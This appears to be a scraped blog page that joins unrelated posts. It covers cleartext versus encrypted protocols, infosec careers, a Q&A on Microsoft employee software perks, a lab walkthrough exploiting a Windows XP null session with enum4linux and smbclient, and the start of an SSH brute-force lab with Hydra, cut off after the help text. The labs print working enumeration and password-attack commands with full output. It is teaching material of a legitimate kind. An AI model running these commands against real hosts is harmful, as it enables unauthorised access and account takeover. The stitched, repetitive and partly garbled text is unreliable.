Clear Text Protocol handles data over any network without any transformation or encryption. The attacker will eavesdrop on the communication which is performing an unwanted attack in a way.
 

Because whatever data is written in human languages, its nature's according cleartext protocol can be intercepted, eavesdrop and mangle very easily. Because the data that is being translated is not encrypted information on the boon network, public network or private network. If there is absolutely no alternative to a clear text protocol you should use it only on trusted network.


A cryptographic protocol provides services by encrypting any data or information over a network with tight security. Cryptographic protocols have many different goals one of them is to prevent is eavesdropping.

Eavesdropping that's mean is an attack also known as sniffing or snooping attack, is a theft of information as it is transmitted over the network by a computer, smartphone or another connected device that attackers takes advantage of unsecured network communications to access data as it is being sent or received by its user.


If an attacker intercept the traffic, they will not be able to understand it.
 

If you need to transmit private information such as username and password, then you should always use cryptographic protocol, this cryptographic protocol allows over the network communication with tight security.

What if you need to run a clear text protocol on an untrusted network?

You can wrap (tunnel) a clear text protocol into a cryptographic one.

A great example of protocol tunneling is a VPN.

A virtual Private Network (VPN) uses cryptography to extend a private network over the public one, like the internet. The extension is made by performing a protected connection to a private network (such as your office or home network). From the client point of view, being in the VPN is the same as being directly connected to the private network.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
 

There is a deep well of information security because in the world which people prefer to use computer more than understand how it works and in what ways break any security.

The term hacker was born in the sixties in the MIT community. To such people, we can feel things like their inner curiosity, highly intelligent, strongly motivated. Information Security Field


The world of Infosec may hackers, keeping curiosity about the computer system and bypassing restrictions in new ways even software vendors for programmers and understanding any security pitfall of any kind of implementation.


Being able to attack also means being able to have an in-depth understanding of the techniques and workings of the target system. To be a hacker means you should have that hunger which is present in successful hackers today. Hackers explore and improve their skills daily.

There is always something new to learn something interesting to try for something exciting to Study

NOTE- The history of hacking could be a complete book in itself.

If you search the word hacking on the internet, then not only you will get the results of every word of the world of hacking.

Hacking is more of an approach or a lifestyle applied to telephone lines people and software development.


Becoming an information security professional means acquiring the knowledge of hacking with your own honesty and never stop challenging yourself and your colleagues.


Nowadays a big company or government store or processes any kind of confidential data using advanced technology on computer or mobile device.

The data is not only organized but also has to be transmitted from private network to public network or any other computer. It is a must to protect sensitive information. Companies pay a premium to safeguard their data and ensure that their systems are protected or atleast they should

Also read - CEHv10 Pentesting

Career opportunities

The even more important sectors is the national cyber security. Recently Government have to face a broad range of Cyber threats: global cyber syndicates hackers for hire activist terrorist and state sponsored hackers.

With critical infrastructure like power plants, trains, aeroplanes, or dams being controlled by computers using hacking skills for good has become critical for the safety of nations.

Companies and governments need it Implementing hardware and software defense systems to protect their digital assets.



At the same time, they are required to train every single employee in their entire organization-

# Secure applications are developed.
# Proper defensive measures are taken and
# That proper use of the companies data is in place.



IT Security is a very difficult game a way to ensure that a system is secure from cyber threats is by hiring your penetration Tester.



Penetration Tester is also known as penteseters are professionals who are hired to simulate a hacking attack against a network, computer system or a web application or the entire organisation.

They master the same tools and techniques that malicious hackers use to discover any and all vulnerability in the system they test.

Also read - CEHv10 Terminologies

These Highly skilled professionals often work-

# Work as a freelancer,
# In an IT security services company,
# As at work from home.

Moreover, as IT is a broad knowledge domain, they can specialize in specific infosec sectors such as:

# System attacks
# Web application attacks
# Malware analysis
# Reverse Engineering
# Android applications
# Others


Passionate, skillful and knowledge hungry is essential for a successful pentesting career.

Also read - What is Hacking ? is it illegal or legal ?

Information Security Terms

Speaking the domain language is fundamental in any field it helps you to better understand the industry and better communicate with your colleagues.

Also read - Information security terms

Root or Administrator

The root or Administrator users are the users who manage IT networks or single systems. They have the maximum privileges over a system.

Privileges

In a computer system, privileges identify the action that a user is allowed to do. The higher the privileges, the more the control over a systems a user has. Privileges escalation is an attack where a malicious user gains elevated privileges over a system.


 

Also read - DOS and DDOS Attack

Remote Code Execution

During a remote code execution attack a malicious user manager to execute some attacker controlled code on a victim remote machine. Remote code execution vulnerability is a very dangerous can be exploited over the network by remote attacker.

Also read - RCE practical here

ShellCode

A shell code is a piece of custom code which provides attack sale on the victim machine. Shellcodes are generally used during remote code execution attacks.

Disclaimer

Do Microsoft employees get free Microsoft software?

Yes. In most cases, Microsoft employees get to use Microsoft softwares for free.

The company has certain policy around it but a simplified takeaway is: as long as the Microsoft software is not used to make money and is used by the employee himself, no matter at work or at home, on work machines or on home machines, for business propose or personal use, the employee doesn't have to pay for the software.

Examples:

# Windows is free to employees. You can bring your personal laptops to office and install Windows from corpnet. You can get a key from an internal IT site and use that to activate the Windows. There is a cap on the max number of keys every employee can request, though. I have never hit the cap, btw.

# Same to Office. Just bring your machine to office and install from intranet. You can also VPN from home to corpnet and install it to home machine.

# Visual Studio is free. All SKUs, including the Ultimate.

# SQL Server is free.

# Other server products like Sharepoint, Exchange, etc. If you were to build your own personal site using Sharepoint, you don't have to pay for the software -- it's just that few people are hosting Sharepoint and Exchange outside of office for their personal use.

# Employee gets MSDN subscription for free. You can download Windows and other softwares from MSDN subscription, along with the activation key. MSDN subscription also gives an Azure subscription for free (with some monetary cap),
 
#Employee can get internal consumption Azure subscription. All cost on the subscription goes to your cost center (meaning: your department pays for it). There is no monetary cap on such subscriptions, though the subscription itself is subject to a common quota, such as no more than N cores for virtual machines. As far as I remember, N is probably 350 (maybe less).

# Under the internal consumption Azure subscription, employees get unlimited hours of build time in Visual Studio Online.

Exceptions:

# Games are not free. Including PC games (e.g. Flight Simulation) and XBox games.
# Some less widely used softwares, such as Streets and Trips (discontinued).
# Office for Mac. People who write products for Mac get those for free. But not everybody.


But some of the games made by Microsoft can be bought from company store for a quite deep discount. But you can't resale it. There were people reselling Windows they bought from company store and got into jail.


Disclosure and credibility: Eric Zheng he  have worked in Microsoft for 13 years.

Thanks for your time Mr. Eric Zheng.

Disclaimer

The final goal of the blog is to tell you how to retrieve information from the target machine such as shares, users, groups and so on! Moreover by navigating the remote machine, you should be able to find a file name "Congratulations.txt\". Download it and explore its content.

A windows share machine can share a file or a directory on the network; this lets local and remote users access the resources and, possible, modify it. Eliminate Your Fears And Doubts About Null Session Attack

Example

A file server in an office lets users open and edit the document of their own departement, while it lets everyone read but modify public information files.

This features is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company.Shares can be either extremely useful if used properly or extremely dangerous when configured improperly.Creating network shares in a windows based environment is fairly easy. Generally uses just need to turn on the file and printer sharing services and then they can start using directories or files to share.

Users can also set permissions on a share showing who can perform operations such as reading and writing and modifying permissions. Starting from windows which the users can choose to share a single file or use the public directory when sharing a single file they can choose local or remote users to share the file with.When using the public directory they can choose which local users can access the files on the share but they can only allow everyone or no one in the network to access the share.




An authorised user can access share by using universal naming convention path (UNC path).


The Format of a UNC path is-

\\ServerName\ShareName\file.nat

Administrative shares

There are also some special default administrative shares which are used by system administrators and windows itself:

\\Computer Nmae\C$ lets and administrator access a volume on the local machine. Every volume has a share (C$, D$, E$, etc).

\\ComputerName\admin$ points to the windows installation directory.

\\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via windows explorer.



You can test volume share and the admin$ share on your computer by entering the following on a windows explorer address bar


\\localhost\<sharename>

\\localhost\d$

 

Null session attacks can be used to enumerate write a lot of information. Attackers can steal information about-


# Passwords
# System Users
# System Group
# Running system processes


Null sessions remotely exploitable this means that attackers can use their computers to attack a vulnerable windows machine. Moreover, this can be used to call remotely API and remote procedure calls because of these factors Null session attack had a huge impact on windows ecosystem.

Nowadays is configured to be a immune from this kind of attack. However, legacy hosts can still be vulnerable.

A null session case and vulnerability for windows administrative shares, this lets an attacker and connect to a local or remote share without authentication.

We will go through the enumeration of windows shares and their exploitation by using various techniques and tools.

Tools

The best tools for this lab are:

# emun4linux
# samrdump
# smbclient

Steps

# Find a target in the network
# Check for null session
# Exploit null session

It\'s time to get our hands dirty.



# Gather information with enum4linux

Use enum4linux and gather the following information:

# Shares
# Users
# Password policies
# Groups



Use smbclient to navigate the target machine

Mount or use the smbclient interactive command line in order to navigate the remote machine and find and inspect the content of the Congratulations.txt file.

Find a target in the network

We first need to verify which the remote network is. We can do it by running ifconfig and checking the IP address of our tap0 interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2201  bytes 96326 (94.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2201  bytes 96326 (94.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
        ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 363 (363.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 522  bytes 22356 (21.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
        inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 92211  bytes 102634365 (97.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 55571  bytes 9521350 (9.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see the target network is 192.168.99.0/24 (note that your IP address may be different from the previous screenshot). Let\'s run nmap in order to discover alive hosts on the network: 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 192.168.99.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
Nmap scan report for 192.168.99.162
Host is up (0.53s latency).
MAC Address: 00:50:56:A5:DF:D7 (VMware)
Nmap scan report for 192.168.99.101
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).

Check for null session

Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

We can see that the File Server Service is active and the string \<20> appears in the list.

Exploit null session

It is time to get our hands dirty!

Gather information with enum4linux

Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -a 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.99.162    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.99.162    |
 ============================================== 
Looking up status of 192.168.99.162
        ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-A5-DF-D7

 ======================================= 
|    Session Check on 192.168.99.162    |
 ======================================= 
[+] Server 192.168.99.162 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.99.162    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.99.162    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.99.162 from smbclient: 
[+] Got OS info for 192.168.99.162 from srvinfo:
        192.168.99.162 Wk Sv NT PtB LMB     
        platform_id     :       500
        os version      :       5.1
        server type     :       0x51003

 =============================== 
|    Users on 192.168.99.162    |
 =============================== 
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service

user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]

 =========================================== 
|    Share Enumeration on 192.168.99.162    |
 =========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk      
        IPC$            IPC       Remote IPC
        Frank           Disk      
        C               Disk      
        WorkSharing     Disk      
        FrankDocs       Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------

[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
//192.168.99.162/Frank  Mapping: OK     Listing: DENIED
//192.168.99.162/C      [E] Can't understand response:
  AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
  boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
  CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
  Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
  IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
  MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
  NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
  ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
  pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
  Program Files                      DR        0  Mon Oct  3 21:40:27 2016
  System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
  WINDOWS                             D        0  Mon Oct  3 21:42:49 2016

                785224 blocks of size 4096. 345608 blocks available
//192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$     Mapping: DENIED, Listing: N/A

 ====================================================== 
|    Password Policy Information for 192.168.99.162    |
 ====================================================== 


[+] Attaching to 192.168.99.162 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.99.162)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] ELS-WINXP
        [+] Builtin

[+] Password Info for Domain: ELS-WINXP

        [+] Minimum password length: None
        [+] Password history length: None
        [+] Maximum password age: 42 days 22 hours 47 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================ 
|    Groups on 192.168.99.162    |
 ================================ 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin

[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]

[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank

 ========================================================================= 
|    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''

 =============================================== 
|    Getting printer info for 192.168.99.162    |
 =============================================== 
Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE


enum4linux complete on Sun Dec 26 22:35:32 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see in the previous screenshots, we were able to gather a lot of information from the machine.

Use smbclient to navigate the target machine

A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

First let us get the list of shares using smbclient:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient -L WORKGROUP -I 192.168.99.162  -N -U ""

        Sharename       Type      Comment
        ---------       ----      -------
        My Documents    Disk      
        IPC$            IPC       Remote IPC
        Frank           Disk      
        C               Disk      
        WorkSharing     Disk      
        FrankDocs       Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

Let us now try to access the WorkSharing share and see what files are stored in there:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                               1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N                                                                             1 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Feb 18 16:37:31 2015
  ..                                  D        0  Wed Feb 18 16:37:31 2015
  Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015

                785224 blocks of size 4096. 345613 blocks available
smb: \> 
smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> 

As we can see in the previous screenshot there is a file namedCongratulations.txt. Let us download it into our machine and then use the cat command to display its content.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ cat congratulations.txt                     
Congratulations! You have successfully exploited a null session!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

Disclaimer

Representation

You are a Penetration Tester hired by the company Hacking Truth to perform Password cracking/Brute Force tests on their internal Web Application and machines after knowing usernames and some kind of security test. You are asked to perform the penetration test on the client premises.

Brute Force and Password Cracking Live on Metasploitable 2 via three different tools

In this metasploitable2 environment, we get access to a Kali GUI instance. An SSH server can be accessed using the tools installed on Kali on virtual machine

Objective: Perform the following activities:

1. Find the password of user "msfadmin" using Hydra. Use password dictionary: //home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt

2. Find the password of user "msfadmin" use appropriate Nmap script. Use password dictionary list bydefault: /usr/share/nmap/nselib/data/passwords.lst and the user list is here /home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

3. Find the password of user "msfadmin" using the ssh_login Metasploit module. Use userpass dictionary: /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

 

Tools

The best tools for this lab are:

# Metasploit Framework
# Hydra
# Nmap

Check the interfaces present on the Kali machine.

Command - ifconfig

 

 There are interface eth0 available and the ip is 192.168.6.45.

Using Hydra

Use Hydra to launch a dictionary attack on the SSH service for the "student" user.

Hydra

# Multi-threaded authentication brute force tool
# Supports numerous protocols, including FTP, HTTP, IMAP, IRC, LDAP, SSH, VNC, etc.
# Written in C


Hydra help option

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ hydra -h                                                                                       
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
